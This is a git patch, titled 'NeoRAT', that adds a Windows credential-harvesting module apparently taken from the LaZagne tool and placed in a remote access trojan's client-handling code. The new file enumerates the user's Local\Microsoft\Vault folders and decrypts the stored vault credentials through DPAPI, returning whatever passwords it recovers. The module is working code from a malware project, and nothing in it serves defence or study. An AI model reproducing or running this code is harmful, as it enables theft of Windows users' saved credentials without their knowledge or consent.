From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/windows/vaultfiles.py        | 23 ++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/windows/vaultfiles.py

(limited to 'foreign/client_handling/lazagne/softwares/windows/vaultfiles.py')

diff --git a/foreign/client_handling/lazagne/softwares/windows/vaultfiles.py b/foreign/client_handling/lazagne/softwares/windows/vaultfiles.py
new file mode 100644
index 0000000..57544b8
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/windows/vaultfiles.py
@@ -0,0 +1,23 @@
+# -*- coding: utf-8 -*-
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.constant import constant
+import os
+
+
+class VaultFiles(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, 'vaultfiles', 'windows', dpapi_used=True)
+
+    def run(self):
+
+        pwd_found = []
+        if constant.user_dpapi and constant.user_dpapi.unlocked:
+            main_vault_directory = os.path.join(constant.profile['APPDATA'], u'..', u'Local', u'Microsoft', u'Vault')
+            main_vault_directory =  os.path.abspath(main_vault_directory)
+            if os.path.exists(main_vault_directory):
+                for vault_directory in os.listdir(main_vault_directory):
+                    cred = constant.user_dpapi.decrypt_vault(os.path.join(main_vault_directory, vault_directory))
+                    if cred:
+                        pwd_found.append(cred)
+
+        return pwd_found
-- 
cgit v1.2.3